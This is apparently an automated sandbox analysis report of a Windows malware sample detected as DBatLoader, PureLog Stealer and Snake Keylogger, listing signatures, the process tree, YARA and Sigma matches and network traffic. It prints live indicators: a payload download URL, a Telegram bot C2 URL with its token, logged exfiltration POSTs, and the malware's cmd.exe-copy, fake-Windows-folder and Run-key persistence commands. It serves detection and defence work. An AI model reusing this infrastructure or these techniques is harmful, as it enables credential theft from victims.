Windows Analysis Report
EPTMAcgvNZ.exe

Overview

General Information

Sample name: EPTMAcgvNZ.exe (renamed because original name is a hash value)
Original sample name: 059971ff3a7ed8438ae50f1ae60bc161e93c0b32f8a2b3c5a0e56bbfa05d9cd5.exe
Analysis ID: 1562871
MD5: dc614075998696b44ada8a2eed23fc03
SHA1: 911b29ff40b13f6935568153f178867e10946311
SHA256: 059971ff3a7ed8438ae50f1ae60bc161e93c0b32f8a2b3c5a0e56bbfa05d9cd5
Tags: doganalecmdexeuser-JAMESWT_MHT

Detection

DBatLoader, PureLog Stealer, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected PureLog Stealer
Yara detected Snake Keylogger
Yara detected Telegram RAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • EPTMAcgvNZ.exe (PID: 7128 cmdline: "C:\Users\user\Desktop\EPTMAcgvNZ.exe" MD5: DC614075998696B44ADA8A2EED23FC03)
    • cmd.exe (PID: 1396 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\yihfsboC.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • esentutl.exe (PID: 1768 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • esentutl.exe (PID: 7284 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • alpha.pif (PID: 7400 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 7456 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 7496 cmdline: C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • xpha.pif (PID: 7512 cmdline: C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • alpha.pif (PID: 7972 cmdline: C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 8044 cmdline: C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 8064 cmdline: C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • esentutl.exe (PID: 7184 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\EPTMAcgvNZ.exe /d C:\\Users\\Public\\Libraries\\Cobsfhiy.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)
      • conhost.exe (PID: 7192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • yihfsboC.pif (PID: 7240 cmdline: C:\Users\Public\Libraries\yihfsboC.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • Cobsfhiy.PIF (PID: 7568 cmdline: "C:\Users\Public\Libraries\Cobsfhiy.PIF" MD5: DC614075998696B44ADA8A2EED23FC03)
    • yihfsboC.pif (PID: 7660 cmdline: C:\Users\Public\Libraries\yihfsboC.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • Cobsfhiy.PIF (PID: 7808 cmdline: "C:\Users\Public\Libraries\Cobsfhiy.PIF" MD5: DC614075998696B44ADA8A2EED23FC03)
    • yihfsboC.pif (PID: 7924 cmdline: C:\Users\Public\Libraries\yihfsboC.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • cleanup
Name: DBatLoader
Description: This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Download Url": ["https://bitbucket.org/ntim1478/gpmaw/downloads/240_Cobsfhiygmx"]}
{"C2 url": "https://api.telegram.org/bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendMessage"}
Source | Rule | Description | Author | Strings
00000017.00000002.2542721990.0000000034860000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
00000017.00000002.2542721990.0000000034860000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000017.00000002.2542721990.0000000034860000.00000004.08000000.00040000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x28a15:$a1: get_encryptedPassword
  • 0x289e9:$a2: get_encryptedUsername
  • 0x28aad:$a3: get_timePasswordChanged
  • 0x289c5:$a4: get_passwordField
  • 0x28a2b:$a5: set_encryptedPassword
  • 0x287f8:$a7: get_logins
  • 0x24f36:$a10: KeyLoggerEventArgs
  • 0x24f05:$a11: KeyLoggerEventArgsEventHandler
  • 0x288cc:$a13: _encryptedPassword
00000017.00000002.2542721990.0000000034860000.00000004.08000000.00040000.00000000.sdmp | INDICATOR_SUSPICIOUS_EXE_DotNetProcHook | Detects executables with potential process hoocking | ditekSHen
  • 0x2725d:$s1: UnHook
  • 0x271f9:$s2: SetHook
  • 0x27232:$s3: CallNextHook
  • 0x271c1:$s4: _hook
00000017.00000003.1465818240.00000000327BE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
Source | Rule | Description | Author | Strings
14.2.yihfsboC.pif.400000.5.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 99 88 44 24 2B 88 44 24 2F B0 72 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
26.2.yihfsboC.pif.2b4c0000.10.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
26.2.yihfsboC.pif.2b4c0000.10.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
26.2.yihfsboC.pif.2b4c0000.10.raw.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x28a15:$a1: get_encryptedPassword
  • 0x289e9:$a2: get_encryptedUsername
  • 0x28aad:$a3: get_timePasswordChanged
  • 0x289c5:$a4: get_passwordField
  • 0x28a2b:$a5: set_encryptedPassword
  • 0x287f8:$a7: get_logins
  • 0x24f36:$a10: KeyLoggerEventArgs
  • 0x24f05:$a11: KeyLoggerEventArgsEventHandler
  • 0x288cc:$a13: _encryptedPassword
26.2.yihfsboC.pif.2b4c0000.10.raw.unpack | INDICATOR_SUSPICIOUS_EXE_DotNetProcHook | Detects executables with potential process hoocking | ditekSHen
  • 0x2725d:$s1: UnHook
  • 0x271f9:$s2: SetHook
  • 0x27232:$s3: CallNextHook
  • 0x271c1:$s4: _hook

            System Summary

            Source: File created | Author: frack113, Nasreddine Bencherchali | Data: EventID: 11, Image: C:\Users\user\Desktop\EPTMAcgvNZ.exe, ProcessId: 7128, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
            Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: C:\Users\Public\Libraries\yihfsboC.pif, CommandLine: C:\Users\Public\Libraries\yihfsboC.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\yihfsboC.pif, NewProcessName: C:\Users\Public\Libraries\yihfsboC.pif, OriginalFileName: C:\Users\Public\Libraries\yihfsboC.pif, ParentCommandLine: "C:\Users\user\Desktop\EPTMAcgvNZ.exe", ParentImage: C:\Users\user\Desktop\EPTMAcgvNZ.exe, ParentProcessId: 7128, ParentProcessName: EPTMAcgvNZ.exe, ProcessCommandLine: C:\Users\Public\Libraries\yihfsboC.pif, ProcessId: 7240, ProcessName: yihfsboC.pif
            Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\Public\Cobsfhiy.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\EPTMAcgvNZ.exe, ProcessId: 7128, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cobsfhiy
            Source: Network Connection | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: DestinationIp: 132.226.8.169, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Public\Libraries\yihfsboC.pif, Initiated: true, ProcessId: 7240, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49710
            Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\Public\Cobsfhiy.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\EPTMAcgvNZ.exe, ProcessId: 7128, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cobsfhiy
            Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: C:\Users\Public\Libraries\yihfsboC.pif, CommandLine: C:\Users\Public\Libraries\yihfsboC.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\yihfsboC.pif, NewProcessName: C:\Users\Public\Libraries\yihfsboC.pif, OriginalFileName: C:\Users\Public\Libraries\yihfsboC.pif, ParentCommandLine: "C:\Users\user\Desktop\EPTMAcgvNZ.exe", ParentImage: C:\Users\user\Desktop\EPTMAcgvNZ.exe, ParentProcessId: 7128, ParentProcessName: EPTMAcgvNZ.exe, ProcessCommandLine: C:\Users\Public\Libraries\yihfsboC.pif, ProcessId: 7240, ProcessName: yihfsboC.pif
            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-11-26T08:24:42.922117+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49702 | 185.166.143.48 | 443 | TCP
            2024-11-26T08:24:45.662912+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49703 | 16.182.70.225 | 443 | TCP

            AV Detection

            Source: EPTMAcgvNZ.exe | Avira: detected
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIF | Avira: detection malicious, Label: TR/AD.Nekark.pgnqj
            Source: EPTMAcgvNZ.exe | Malware Configuration Extractor: DBatLoader {"Download Url": ["https://bitbucket.org/ntim1478/gpmaw/downloads/240_Cobsfhiygmx"]}
            Source: yihfsboC.pif.7240.14.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendMessage"}
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIF | ReversingLabs: Detection: 63%
            Source: EPTMAcgvNZ.exe | ReversingLabs: Detection: 63%
            Source: EPTMAcgvNZ.exe | Virustotal: Detection: 71%
            Source: Submited Sample | Integrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIF | Joe Sandbox ML: detected
            Source: EPTMAcgvNZ.exe | Joe Sandbox ML: detected

            Compliance

            Source: C:\Users\Public\Libraries\yihfsboC.pif | Unpacked PE file: 14.2.yihfsboC.pif.400000.5.unpack
            Source: C:\Users\Public\Libraries\yihfsboC.pif | Unpacked PE file: 23.2.yihfsboC.pif.400000.1.unpack
            Source: C:\Users\Public\Libraries\yihfsboC.pif | Unpacked PE file: 26.2.yihfsboC.pif.400000.0.unpack
            Source: EPTMAcgvNZ.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: unknown | HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.7:49702 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 16.182.70.225:443 -> 192.168.2.7:49703 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49742 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49764 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49776 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49972 version: TLS 1.2
            Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000001.1460585249.00000000004F0000.00000040.00000001.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2505611445.00000000004F0000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: easinvoker.pdb source: EPTMAcgvNZ.exe, EPTMAcgvNZ.exe, 00000000.00000002.1396601704.0000000020840000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1355304078.0000000002326000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1396601704.00000000207F0000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1252312705.000000007FC90000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000001160000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000001.1460585249.00000000004F0000.00000040.00000001.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2505611445.00000000004F0000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: _.pdb source: yihfsboC.pif, 0000000E.00000003.1357241369.0000000024219000.00000004.00000020.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2540746609.0000000027061000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2535779078.0000000025D2B000.00000004.00000020.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2541431650.00000000285A0000.00000004.08000000.00040000.00000000.sdmp, yihfsboC.pif, 00000017.00000003.1465818240.00000000327BE000.00000004.00000020.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2540455156.000000003429B000.00000004.00000020.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2546648768.0000000035951000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2541674509.0000000034690000.00000004.08000000.00040000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2532622056.000000002859B000.00000004.00000020.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2537622019.0000000029911000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000003.1551837223.00000000268CE000.00000004.00000020.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2538166394.000000002AE90000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: cmd.pdbUGP source: esentutl.exe, 0000000B.00000003.1343597918.0000000005650000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000010.00000002.1408812461.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000012.00000000.1420522255.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000013.00000002.1534376052.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001B.00000002.1582953816.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001C.00000002.1619637523.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001D.00000002.1624785769.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif.11.dr
            Source: Binary string: ping.pdbGCTL source: esentutl.exe, 0000000F.00000003.1355379307.0000000005960000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000014.00000002.1533195513.0000000000381000.00000020.00000001.01000000.0000000B.sdmp, xpha.pif.15.dr
            Source: Binary string: easinvoker.pdbH source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000001.1460585249.00000000004F0000.00000040.00000001.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2505611445.00000000004F0000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: easinvoker.pdbGCTL source: EPTMAcgvNZ.exe, 00000000.00000002.1396601704.0000000020840000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1347686581.00000000217CE000.00000004.00000020.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1347686581.000000002179D000.00000004.00000020.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1355304078.0000000002326000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1396601704.00000000207F0000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1252312705.000000007FC90000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000001160000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 00000013.00000002.1534376052.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001B.00000002.1582953816.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001C.00000002.1619637523.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001D.00000002.1624785769.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif.11.dr
            Source: Binary string: ping.pdb source: esentutl.exe, 0000000F.00000003.1355379307.0000000005960000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 00000014.00000002.1533195513.0000000000381000.00000020.00000001.01000000.0000000B.sdmp, xpha.pif.15.dr
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe Code function: 0_2_02B15908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 0_2_02B15908
            Source: C:\Users\Public\alpha.pif Code function: 16_2_003A0207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 16_2_003A0207
            Source: C:\Users\Public\alpha.pif Code function: 16_2_003A589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 16_2_003A589A
            Source: C:\Users\Public\alpha.pif Code function: 16_2_003B3E66 FindFirstFileW,FindNextFileW,FindClose, 16_2_003B3E66
            Source: C:\Users\Public\alpha.pif Code function: 16_2_003A4EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 16_2_003A4EC1
            Source: C:\Users\Public\alpha.pif Code function: 16_2_0039532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose, 16_2_0039532E
            Source: C:\Users\Public\alpha.pif Code function: 19_2_003A589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 19_2_003A589A
            Source: C:\Users\Public\alpha.pif Code function: 19_2_003A0207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 19_2_003A0207
            Source: C:\Users\Public\alpha.pif Code function: 19_2_003B3E66 FindFirstFileW,FindNextFileW,FindClose, 19_2_003B3E66
            Source: C:\Users\Public\alpha.pif Code function: 19_2_003A4EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 19_2_003A4EC1
            Source: C:\Users\Public\alpha.pif Code function: 19_2_0039532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose, 19_2_0039532E

            Networking

            Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49791 -> 149.154.167.220:443
            Source: Malware configuration extractor, URLs: https://bitbucket.org/ntim1478/gpmaw/downloads/240_Cobsfhiygmx
            Source: unknown, DNS query: name: api.telegram.org
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe, Code function: 0_2_02B2E4B8 InternetCheckConnectionA, 0_2_02B2E4B8
            Source: global traffic, HTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd0dc18a308c59 Host: api.telegram.org Content-Length: 537 Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0dc191055343Host: api.telegram.orgContent-Length: 537Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0dc19698755dHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0dd94d3b31f7Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0dcf44be8900Host: api.telegram.orgContent-Length: 537Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0df0efc49c34Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0e138cddbc0cHost: api.telegram.orgContent-Length: 537
